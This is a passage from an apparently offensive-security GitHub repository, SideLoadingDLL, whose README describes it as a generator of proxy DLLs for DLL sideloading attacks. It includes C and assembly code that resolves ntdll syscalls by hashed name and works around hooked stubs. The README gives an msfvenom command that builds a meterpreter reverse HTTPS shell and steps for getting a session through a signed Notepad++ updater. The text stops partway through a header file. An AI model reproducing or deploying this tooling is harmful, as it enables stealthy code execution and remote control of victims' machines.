├── .gitignore
├── LICENSE
├── README.md
├── SideLoadingDLL
├── .vs
│ └── SideLoadingDLL
│ │ ├── FileContentIndex
│ │ ├── 73454454-f1d4-4963-b583-a42c666a7379.vsidx
│ │ └── read.lock
│ │ └── v17
│ │ ├── .suo
│ │ ├── Browse.VC.db
│ │ └── ipch
│ │ └── AutoPCH
│ │ ├── 7d95276ac630db28
│ │ └── RECYCLEGATE.ipch
│ │ └── fbba1bce1403490f
│ │ └── DLLMAIN.ipch
├── SideLoadingDLL.sln
├── SideLoadingDLL
│ ├── Defines.h
│ ├── GateTrampolin.asm
│ ├── RecycleGate.c
│ ├── RecycleGate.h
│ ├── SideLoadingDLL.vcxproj
│ ├── SideLoadingDLL.vcxproj.filters
│ ├── SideLoadingDLL.vcxproj.user
│ ├── dllmain.c
│ ├── framework.h
│ └── x64
│ │ └── Release
│ │ ├── GateTrampolin.obj
│ │ ├── RecycleGate.obj
│ │ ├── SideLoadingDLL.Build.CppClean.log
│ │ ├── SideLoadingDLL.dll.recipe
│ │ ├── SideLoadingDLL.iobj
│ │ ├── SideLoadingDLL.ipdb
│ │ ├── SideLoadingDLL.log
│ │ ├── SideLoadingDLL.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── Masm.read.1u.tlog
│ │ ├── Masm.write.1u.tlog
│ │ ├── SideLoadingDLL.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ └── link.write.2u.tlog
│ │ ├── SideLoadingDLL.vcxproj.FileListAbsolute.txt
│ │ ├── dllmain.obj
│ │ ├── userenv-syscalls.Build.CppClean.log
│ │ ├── userenv-syscalls.dll.recipe
│ │ ├── userenv-syscalls.log
│ │ ├── userenv-syscalls.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── Masm.read.1u.tlog
│ │ ├── Masm.write.1u.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ ├── userenv-syscalls.lastbuildstate
│ │ └── userenv-syscalls.write.1u.tlog
│ │ ├── userenv-syscalls.vcxproj.FileListAbsolute.txt
│ │ └── vc143.pdb
└── x64
│ └── Release
│ ├── SideLoadingDLL.dll
│ ├── SideLoadingDLL.exp
│ ├── SideLoadingDLL.lib
│ └── SideLoadingDLL.pdb
├── demo
└── screen-capture.gif
├── get_exports.py
└── make.py
/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/*
2 | *.tlog
3 | *.obj
4 | *.log
5 | *.ipdb
6 | *.recipe
7 | *.iobj
8 | *.vsidx
9 | *.db
10 | *.ipch
11 |
12 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 Maor Sabag
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SideLoadingDLL
2 |
3 | Python script to generate "proxy" DLL files load unsafely by binaries on runtime, makes it super easy to perform a DLL Sideloading attack or hijacking.
4 | This implementation makes sure that all system calls still go through ntdll.dll to avoid the usage of direct systemcalls.
5 |
6 | See the below articles for more details
7 | https://flangvik.com/privesc/windows/bypass/2019/06/25/Sideload-like-your-an-APT.html
8 | https://flangvik.com/2019/07/24/Bypassing-AV-DLL-Side-Loading.html
9 |
10 | demo's is using GUP.exe signed from NotePad++, loading a malicious ncrypt sideloading malware:
11 |
12 | Sideloading ncrypt.dll( meterpreter session)
13 | 
14 |
15 | ## Dependencies
16 | - x64 Native Tools Command Prompt for VS
17 | - Python3
18 |
19 | ## Usage
20 | - Find a binary that is vulnerable to SideLoading/DLL Hijacking
21 | - Create a shellcode (msfvenom -p windows/x64/meterpreter_reverse_https LHOST=eth0 LPORT=443 -f raw -o shellcode.bin)
22 | - Run the make.py file with the arguments needed
23 | - Copy the files from the Output directory to the vulnerable program and make sure the injected process is open
24 | - Run the program and get a session back!!
25 |
26 | ## Demo
27 | - You can find the full demo in this [link](https://drive.google.com/file/d/1CR4uV-GGxm8kNZYWHtpSrjMGEgoj1Zr4/view).
28 |
29 | ## Credits
30 | - [Sektor7's RTO Malware Essential Course](https://institute.sektor7.net/red-team-operator-malware-development-essentials)
31 | - [thefLink](https://github.com/thefLink)'s [RecycledGate](https://github.com/thefLink/RecycledGate)
32 |
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/73454454-f1d4-4963-b583-a42c666a7379.vsidx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/73454454-f1d4-4963-b583-a42c666a7379.vsidx
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/read.lock:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/FileContentIndex/read.lock
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/.suo
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/Browse.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/Browse.VC.db
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/7d95276ac630db28/RECYCLEGATE.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/7d95276ac630db28/RECYCLEGATE.ipch
--------------------------------------------------------------------------------
/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/fbba1bce1403490f/DLLMAIN.ipch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/.vs/SideLoadingDLL/v17/ipch/AutoPCH/fbba1bce1403490f/DLLMAIN.ipch
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.0.32014.148
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SideLoadingDLL", "SideLoadingDLL\SideLoadingDLL.vcxproj", "{68E703A8-AFB7-4E92-9841-C085C923AF06}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x64.ActiveCfg = Debug|x64
17 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x64.Build.0 = Debug|x64
18 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x86.ActiveCfg = Debug|Win32
19 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Debug|x86.Build.0 = Debug|Win32
20 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x64.ActiveCfg = Release|x64
21 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x64.Build.0 = Release|x64
22 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x86.ActiveCfg = Release|Win32
23 | {68E703A8-AFB7-4E92-9841-C085C923AF06}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {EC62C3B2-4F33-4AE9-B256-56694335F7F1}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/Defines.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "windows.h"
3 |
4 | typedef VOID(KNORMAL_ROUTINE) (
5 | IN PVOID NormalContext,
6 | IN PVOID SystemArgument1,
7 | IN PVOID SystemArgument2);
8 |
9 | typedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;
10 |
11 | #define InitializeObjectAttributes( p, n, a, r, s ) { \
12 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
13 | (p)->RootDirectory = r; \
14 | (p)->Attributes = a; \
15 | (p)->ObjectName = n; \
16 | (p)->SecurityDescriptor = s; \
17 | (p)->SecurityQualityOfService = NULL; \
18 | }
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/GateTrampolin.asm:
--------------------------------------------------------------------------------
1 | .code
2 |
3 | PrepareSyscall PROC
4 |
5 | xor r11, r11
6 | xor r10, r10
7 | mov r11, rcx
8 | mov r10, rdx
9 | ret
10 |
11 |
12 | PrepareSyscall ENDP
13 |
14 | DoSyscall Proc
15 |
16 | push r10
17 | xor rax, rax
18 | mov r10, rcx
19 | mov eax, r11d
20 | ret
21 |
22 | DoSyscall ENDP
23 |
24 | end
25 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/RecycleGate.c:
--------------------------------------------------------------------------------
1 | #include "RecycleGate.h"
2 |
3 | DWORD getSyscall(DWORD dwCryptedHash, Syscall* pSyscall) {
4 |
5 | PIMAGE_DOS_HEADER pDosHdr = NULL;
6 | PIMAGE_NT_HEADERS pNtHdrs = NULL;
7 | PIMAGE_EXPORT_DIRECTORY pExportDir = NULL;
8 |
9 | PVOID pGate = NULL, pNtdllBase = NULL, pStub = NULL;
10 | PDWORD pdwAddrOfNames = NULL, pdwAddrOfFunctions = NULL;
11 | PWORD pwAddrOfNameOrdinales = NULL;
12 | DWORD dwSyscallNr = 0, dwSuccess = FAIL;
13 | WORD wIdxStub = 0, wIdxfName = 0;
14 | PCHAR pFunctionName = NULL;
15 | BOOL bHooked = FALSE;
16 |
17 | pNtdllBase = findNtDll();
18 | if (pNtdllBase == NULL)
19 | goto exit;
20 |
21 | pDosHdr = (PIMAGE_DOS_HEADER)pNtdllBase;
22 | pNtHdrs = (PIMAGE_NT_HEADERS)((PBYTE)pNtdllBase + pDosHdr->e_lfanew);
23 | pExportDir = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pNtdllBase + pNtHdrs->OptionalHeader.DataDirectory[0].VirtualAddress);
24 |
25 | pdwAddrOfFunctions = (PDWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfFunctions);
26 | pdwAddrOfNames = (PDWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfNames);
27 | pwAddrOfNameOrdinales = (PWORD)((PBYTE)pNtdllBase + pExportDir->AddressOfNameOrdinals);
28 |
29 | for (wIdxfName = 0; wIdxfName < pExportDir->NumberOfNames; wIdxfName++) {
30 |
31 | pFunctionName = (PCHAR)((PBYTE)pNtdllBase + pdwAddrOfNames[wIdxfName]);
32 | pStub = (PVOID)((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[wIdxfName]]);
33 |
34 | if (djb2(pFunctionName) == xor_hash(dwCryptedHash))
35 | break;
36 |
37 | }
38 |
39 | if (pStub == NULL)
40 | goto exit;
41 |
42 | for (wIdxStub = 0; wIdxStub < SYS_STUB_SIZE; wIdxStub++) {
43 |
44 | if (*((PBYTE)pStub + wIdxStub) == 0xe9) { // This syscall stub is hooked
45 | bHooked = TRUE;
46 | break;
47 | }
48 |
49 | if (*((PBYTE)pStub + wIdxStub) == 0xc3) // Too far
50 | goto exit;
51 |
52 | if (*((PBYTE)pStub + wIdxStub) == 0x4c && *((PBYTE)pStub + wIdxStub + 1) == 0x8b && *((PBYTE)pStub + wIdxStub + 2) == 0xd1 &&
53 | *((PBYTE)pStub + wIdxStub + 3) == 0xb8 && *((PBYTE)pStub + wIdxStub + 6) == 0x00 && *((PBYTE)pStub + wIdxStub + 7) == 0x00) {
54 |
55 | BYTE low = *((PBYTE)pStub + 4 + wIdxStub);
56 | BYTE high = *((PBYTE)pStub + 5 + wIdxStub);
57 |
58 | dwSyscallNr = (high << 8) | low;
59 |
60 | break;
61 |
62 | }
63 | }
64 |
65 | if (bHooked) { // Check syscalls around our hooked syscall
66 |
67 |
68 | for (wIdxfName = 1; wIdxfName <= pExportDir->NumberOfFunctions; wIdxfName++) {
69 | if ((PBYTE)pStub + wIdxfName * DOWN < ((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[pExportDir->NumberOfFunctions - 1]])) {
70 | if (
71 | *((PBYTE)pStub + wIdxfName * DOWN) == 0x4c
72 | && *((PBYTE)pStub + 1 + wIdxfName * DOWN) == 0x8b
73 | && *((PBYTE)pStub + 2 + wIdxfName * DOWN) == 0xd1
74 | && *((PBYTE)pStub + 3 + wIdxfName * DOWN) == 0xb8
75 | && *((PBYTE)pStub + 6 + wIdxfName * DOWN) == 0x00
76 | && *((PBYTE)pStub + 7 + wIdxfName * DOWN) == 0x00) {
77 |
78 | BYTE high = *((PBYTE)pStub + 5 + wIdxfName * DOWN);
79 | BYTE low = *((PBYTE)pStub + 4 + wIdxfName * DOWN);
80 | dwSyscallNr = (high << 8) | low - wIdxfName;
81 |
82 | pStub = (PVOID)((PBYTE)pStub + wIdxfName * DOWN);
83 |
84 | break;
85 |
86 | }
87 | }
88 |
89 | if ((PBYTE)pStub + wIdxfName * UP > ((PBYTE)pNtdllBase + pdwAddrOfFunctions[pwAddrOfNameOrdinales[0]])) {
90 |
91 | if (*((PBYTE)pStub + wIdxfName * UP) == 0x4c
92 | && *((PBYTE)pStub + 1 + wIdxfName * UP) == 0x8b
93 | && *((PBYTE)pStub + 2 + wIdxfName * UP) == 0xd1
94 | && *((PBYTE)pStub + 3 + wIdxfName * UP) == 0xb8
95 | && *((PBYTE)pStub + 6 + wIdxfName * UP) == 0x00
96 | && *((PBYTE)pStub + 7 + wIdxfName * UP) == 0x00) {
97 |
98 | BYTE high = *((PBYTE)pStub + 5 + wIdxfName * UP);
99 | BYTE low = *((PBYTE)pStub + 4 + wIdxfName * UP);
100 | dwSyscallNr = (high << 8) | low + wIdxfName;
101 |
102 | pStub = (PVOID)((PBYTE)pStub + wIdxfName * UP);
103 |
104 | break;
105 |
106 | }
107 | }
108 | }
109 |
110 |
111 | }
112 |
113 | if (pStub && dwSyscallNr) { // Last step: Search for syscall ; ret to use directly
114 | for (wIdxStub = 0; wIdxStub < SYS_STUB_SIZE; wIdxStub++) {
115 | if (*((PBYTE)pStub + wIdxStub) == 0x0f && *((PBYTE)pStub + wIdxStub + 1) == 0x05 && *((PBYTE)pStub + wIdxStub + 2) == 0xc3) { // syscall; ret - sequence?
116 | pGate = (LPVOID)((PBYTE)pStub + wIdxStub);
117 | break;
118 | }
119 | }
120 | }
121 |
122 |
123 | if (pGate == NULL || dwSyscallNr == 0x00)
124 | goto exit;
125 |
126 | pSyscall->pRecycledGate = pGate;
127 | pSyscall->dwSyscallNr = dwSyscallNr;
128 |
129 |
130 | dwSuccess = SUCCESS;
131 |
132 | exit:
133 |
134 | return dwSuccess;
135 |
136 | }
137 |
138 | PVOID findNtDll(void) {
139 |
140 | PPEB pPeb = NULL;
141 | PPEB_LDR_DATA pLdrData = NULL;
142 | PLDR_DATA_TABLE_ENTRY pModuleEntry = NULL, pModuleStart = NULL;
143 | PUNICODE_STR pDllName = NULL;
144 |
145 | PVOID pNtdllBase = NULL;
146 |
147 | pPeb = (PPEB)__readgsqword(0x60);
148 | pLdrData = pPeb->pLdr;
149 | pModuleEntry = pModuleStart = (PLDR_DATA_TABLE_ENTRY)pLdrData->InMemoryOrderModuleList.Flink;
150 |
151 | do {
152 |
153 | pDllName = &pModuleEntry->BaseDllName;
154 |
155 | if (pDllName->pBuffer == NULL)
156 | return NULL;
157 |
158 | if (djb2_unicode(toLower(pDllName->pBuffer)) == xor_hash(0x6391f6a9)) {
159 | pNtdllBase = (PVOID)pModuleEntry->DllBase;
160 | break;
161 | }
162 |
163 | pModuleEntry = (PLDR_DATA_TABLE_ENTRY)pModuleEntry->InMemoryOrderModuleList.Flink;
164 |
165 | } while (pModuleEntry != pModuleStart);
166 |
167 | return pNtdllBase;
168 |
169 | }
170 |
171 | unsigned long
172 | djb2_unicode(const wchar_t* str)
173 | {
174 |
175 | unsigned long hash = 5381;
176 | DWORD val;
177 |
178 | while (*str != 0) {
179 | val = (DWORD)*str++;
180 | hash = ((hash << 5) + hash) + val;
181 | }
182 |
183 | return hash;
184 |
185 | }
186 |
187 | unsigned long
188 | djb2(unsigned char* str)
189 | {
190 | unsigned long hash = 5381;
191 | int c;
192 |
193 | while ((c = *str++))
194 | hash = ((hash << 5) + hash) + c;
195 |
196 | return hash;
197 | }
198 |
199 | WCHAR*
200 | toLower(WCHAR* str)
201 | {
202 |
203 | WCHAR* start = str;
204 |
205 | while (*str) {
206 |
207 | if (*str <= L'Z' && *str >= 'A') {
208 | *str += 32;
209 | }
210 |
211 | str += 1;
212 |
213 | }
214 |
215 | return start;
216 |
217 | }
218 |
219 | unsigned long
220 | xor_hash(unsigned long hash) {
221 | return hash ^ HASH_KEY;
222 | }
223 |
224 | int my_strcmp(const char* p1, const char* p2) {
225 | const unsigned char* s1 = (const unsigned char*)p1;
226 | const unsigned char* s2 = (const unsigned char*)p2;
227 | unsigned char c1, c2;
228 | do {
229 | c1 = (unsigned char)*s1++;
230 | c2 = (unsigned char)*s2++;
231 | if (c1 == '\0') {
232 | return c1 - c2;
233 | }
234 | } while (c1 == c2);
235 | return c1 - c2;
236 | }
237 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/RecycleGate.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include "windows.h"
4 |
5 | #define FAIL 0
6 | #define SUCCESS 1
7 |
8 | #define HASH_KEY 0x41424344
9 | #define SYS_STUB_SIZE 32
10 |
11 | #define UP -32
12 | #define DOWN 32
13 |
14 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
15 |
16 | typedef struct {
17 |
18 | DWORD dwSyscallNr;
19 | PVOID pRecycledGate;
20 |
21 | } Syscall;
22 |
23 | typedef struct _UNICODE_STR {
24 | USHORT Length;
25 | USHORT MaximumLength;
26 | PWSTR pBuffer;
27 | } UNICODE_STR, * PUNICODE_STR;
28 |
29 | typedef struct _OBJECT_ATTRIBUTES {
30 | ULONG Length;
31 | HANDLE RootDirectory;
32 | PUNICODE_STR ObjectName;
33 | ULONG Attributes;
34 | PVOID SecurityDescriptor;
35 | PVOID SecurityQualityOfService;
36 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
37 |
38 | typedef struct _PEB_LDR_DATA
39 | {
40 | DWORD dwLength;
41 | DWORD dwInitialized;
42 | LPVOID lpSsHandle;
43 | LIST_ENTRY InLoadOrderModuleList;
44 | LIST_ENTRY InMemoryOrderModuleList;
45 | LIST_ENTRY InInitializationOrderModuleList;
46 | LPVOID lpEntryInProgress;
47 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
48 |
49 | typedef struct _LDR_DATA_TABLE_ENTRY
50 | {
51 | LIST_ENTRY InMemoryOrderModuleList;
52 | LIST_ENTRY InInitializationOrderModuleList;
53 | PVOID DllBase;
54 | PVOID EntryPoint;
55 | ULONG SizeOfImage;
56 | UNICODE_STR FullDllName;
57 | UNICODE_STR BaseDllName;
58 | ULONG Flags;
59 | SHORT LoadCount;
60 | SHORT TlsIndex;
61 | LIST_ENTRY HashTableEntry;
62 | ULONG TimeDateStamp;
63 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
64 |
65 | typedef struct _PEB_FREE_BLOCK
66 | {
67 | struct _PEB_FREE_BLOCK* pNext;
68 | DWORD dwSize;
69 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
70 |
71 | typedef struct _PEB
72 | {
73 | BYTE bInheritedAddressSpace;
74 | BYTE bReadImageFileExecOptions;
75 | BYTE bBeingDebugged;
76 | BYTE bSpareBool;
77 | LPVOID lpMutant;
78 | LPVOID lpImageBaseAddress;
79 | PPEB_LDR_DATA pLdr;
80 | LPVOID lpProcessParameters;
81 | LPVOID lpSubSystemData;
82 | LPVOID lpProcessHeap;
83 | PRTL_CRITICAL_SECTION pFastPebLock;
84 | LPVOID lpFastPebLockRoutine;
85 | LPVOID lpFastPebUnlockRoutine;
86 | DWORD dwEnvironmentUpdateCount;
87 | LPVOID lpKernelCallbackTable;
88 | DWORD dwSystemReserved;
89 | DWORD dwAtlThunkSListPtr32;
90 | PPEB_FREE_BLOCK pFreeList;
91 | DWORD dwTlsExpansionCounter;
92 | LPVOID lpTlsBitmap;
93 | DWORD dwTlsBitmapBits[2];
94 | LPVOID lpReadOnlySharedMemoryBase;
95 | LPVOID lpReadOnlySharedMemoryHeap;
96 | LPVOID lpReadOnlyStaticServerData;
97 | LPVOID lpAnsiCodePageData;
98 | LPVOID lpOemCodePageData;
99 | LPVOID lpUnicodeCaseTableData;
100 | DWORD dwNumberOfProcessors;
101 | DWORD dwNtGlobalFlag;
102 | LARGE_INTEGER liCriticalSectionTimeout;
103 | DWORD dwHeapSegmentReserve;
104 | DWORD dwHeapSegmentCommit;
105 | DWORD dwHeapDeCommitTotalFreeThreshold;
106 | DWORD dwHeapDeCommitFreeBlockThreshold;
107 | DWORD dwNumberOfHeaps;
108 | DWORD dwMaximumNumberOfHeaps;
109 | LPVOID lpProcessHeaps;
110 | LPVOID lpGdiSharedHandleTable;
111 | LPVOID lpProcessStarterHelper;
112 | DWORD dwGdiDCAttributeList;
113 | LPVOID lpLoaderLock;
114 | DWORD dwOSMajorVersion;
115 | DWORD dwOSMinorVersion;
116 | WORD wOSBuildNumber;
117 | WORD wOSCSDVersion;
118 | DWORD dwOSPlatformId;
119 | DWORD dwImageSubsystem;
120 | DWORD dwImageSubsystemMajorVersion;
121 | DWORD dwImageSubsystemMinorVersion;
122 | DWORD dwImageProcessAffinityMask;
123 | DWORD dwGdiHandleBuffer[34];
124 | LPVOID lpPostProcessInitRoutine;
125 | LPVOID lpTlsExpansionBitmap;
126 | DWORD dwTlsExpansionBitmapBits[32];
127 | DWORD dwSessionId;
128 | ULARGE_INTEGER liAppCompatFlags;
129 | ULARGE_INTEGER liAppCompatFlagsUser;
130 | LPVOID lppShimData;
131 | LPVOID lpAppCompatInfo;
132 | UNICODE_STR usCSDVersion;
133 | LPVOID lpActivationContextData;
134 | LPVOID lpProcessAssemblyStorageMap;
135 | LPVOID lpSystemDefaultActivationContextData;
136 | LPVOID lpSystemAssemblyStorageMap;
137 | DWORD dwMinimumStackCommit;
138 | } PEB, * PPEB;
139 |
140 | typedef struct _UNICODE_STRING {
141 | USHORT Length;
142 | USHORT MaximumLength;
143 | PWSTR Buffer;
144 | } UNICODE_STRING, * PUNICODE_STRING;
145 |
146 | typedef enum _SECTION_INHERIT {
147 | ViewShare = 1,
148 | ViewUnmap = 2
149 | } SECTION_INHERIT, * PSECTION_INHERIT;
150 |
151 | typedef struct _SYSTEM_PROCESS_INFO
152 | {
153 | ULONG NextEntryOffset;
154 | ULONG NumberOfThreads;
155 | LARGE_INTEGER Reserved[3];
156 | LARGE_INTEGER CreateTime;
157 | LARGE_INTEGER UserTime;
158 | LARGE_INTEGER KernelTime;
159 | UNICODE_STRING ImageName;
160 | ULONG BasePriority;
161 | HANDLE ProcessId;
162 | HANDLE InheritedFromProcessId;
163 | }SYSTEM_PROCESS_INFO, * PSYSTEM_PROCESS_INFO;
164 |
165 | typedef HMODULE(WINAPI* LoadLibraryA_t)(
166 | LPCSTR lpLibFileName
167 | );
168 |
169 | typedef struct _SYSTEM_HANDLE
170 | {
171 | ULONG ProcessId;
172 | BYTE ObjectTypeNumber;
173 | BYTE Flags;
174 | USHORT Handle;
175 | PVOID Object;
176 | ACCESS_MASK GrantedAccess;
177 | } SYSTEM_HANDLE, * PSYSTEM_HANDLE;
178 |
179 | typedef struct _SYSTEM_HANDLE_INFORMATION
180 | {
181 | ULONG HandleCount;
182 | SYSTEM_HANDLE Handles[1];
183 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
184 |
185 | typedef enum _POOL_TYPE
186 | {
187 | NonPagedPool,
188 | PagedPool,
189 | NonPagedPoolMustSucceed,
190 | DontUseThisType,
191 | NonPagedPoolCacheAligned,
192 | PagedPoolCacheAligned,
193 | NonPagedPoolCacheAlignedMustS
194 | } POOL_TYPE, * PPOOL_TYPE;
195 |
196 | typedef enum _SYSTEM_INFORMATION_CLASS
197 | {
198 | SystemBasicInformation = 0x0,
199 | SystemProcessorInformation = 0x1,
200 | SystemPerformanceInformation = 0x2,
201 | SystemTimeOfDayInformation = 0x3,
202 | SystemPathInformation = 0x4,
203 | SystemProcessInformation = 0x5,
204 | SystemCallCountInformation = 0x6,
205 | SystemDeviceInformation = 0x7,
206 | SystemProcessorPerformanceInformation = 0x8,
207 | SystemFlagsInformation = 0x9,
208 | SystemCallTimeInformation = 0xa,
209 | SystemModuleInformation = 0xb,
210 | SystemLocksInformation = 0xc,
211 | SystemStackTraceInformation = 0xd,
212 | SystemPagedPoolInformation = 0xe,
213 | SystemNonPagedPoolInformation = 0xf,
214 | SystemHandleInformation = 0x10,
215 | SystemObjectInformation = 0x11,
216 | SystemPageFileInformation = 0x12,
217 | SystemVdmInstemulInformation = 0x13,
218 | SystemVdmBopInformation = 0x14,
219 | SystemFileCacheInformation = 0x15,
220 | SystemPoolTagInformation = 0x16,
221 | SystemInterruptInformation = 0x17,
222 | SystemDpcBehaviorInformation = 0x18,
223 | SystemFullMemoryInformation = 0x19,
224 | SystemLoadGdiDriverInformation = 0x1a,
225 | SystemUnloadGdiDriverInformation = 0x1b,
226 | SystemTimeAdjustmentInformation = 0x1c,
227 | SystemSummaryMemoryInformation = 0x1d,
228 | SystemMirrorMemoryInformation = 0x1e,
229 | SystemPerformanceTraceInformation = 0x1f,
230 | SystemObsolete0 = 0x20,
231 | SystemExceptionInformation = 0x21,
232 | SystemCrashDumpStateInformation = 0x22,
233 | SystemKernelDebuggerInformation = 0x23,
234 | SystemContextSwitchInformation = 0x24,
235 | SystemRegistryQuotaInformation = 0x25,
236 | SystemExtendServiceTableInformation = 0x26,
237 | SystemPrioritySeperation = 0x27,
238 | SystemVerifierAddDriverInformation = 0x28,
239 | SystemVerifierRemoveDriverInformation = 0x29,
240 | SystemProcessorIdleInformation = 0x2a,
241 | SystemLegacyDriverInformation = 0x2b,
242 | SystemCurrentTimeZoneInformation = 0x2c,
243 | SystemLookasideInformation = 0x2d,
244 | SystemTimeSlipNotification = 0x2e,
245 | SystemSessionCreate = 0x2f,
246 | SystemSessionDetach = 0x30,
247 | SystemSessionInformation = 0x31,
248 | SystemRangeStartInformation = 0x32,
249 | SystemVerifierInformation = 0x33,
250 | SystemVerifierThunkExtend = 0x34,
251 | SystemSessionProcessInformation = 0x35,
252 | SystemLoadGdiDriverInSystemSpace = 0x36,
253 | SystemNumaProcessorMap = 0x37,
254 | SystemPrefetcherInformation = 0x38,
255 | SystemExtendedProcessInformation = 0x39,
256 | SystemRecommendedSharedDataAlignment = 0x3a,
257 | SystemComPlusPackage = 0x3b,
258 | SystemNumaAvailableMemory = 0x3c,
259 | SystemProcessorPowerInformation = 0x3d,
260 | SystemEmulationBasicInformation = 0x3e,
261 | SystemEmulationProcessorInformation = 0x3f,
262 | SystemExtendedHandleInformation = 0x40,
263 | SystemLostDelayedWriteInformation = 0x41,
264 | SystemBigPoolInformation = 0x42,
265 | SystemSessionPoolTagInformation = 0x43,
266 | SystemSessionMappedViewInformation = 0x44,
267 | SystemHotpatchInformation = 0x45,
268 | SystemObjectSecurityMode = 0x46,
269 | SystemWatchdogTimerHandler = 0x47,
270 | SystemWatchdogTimerInformation = 0x48,
271 | SystemLogicalProcessorInformation = 0x49,
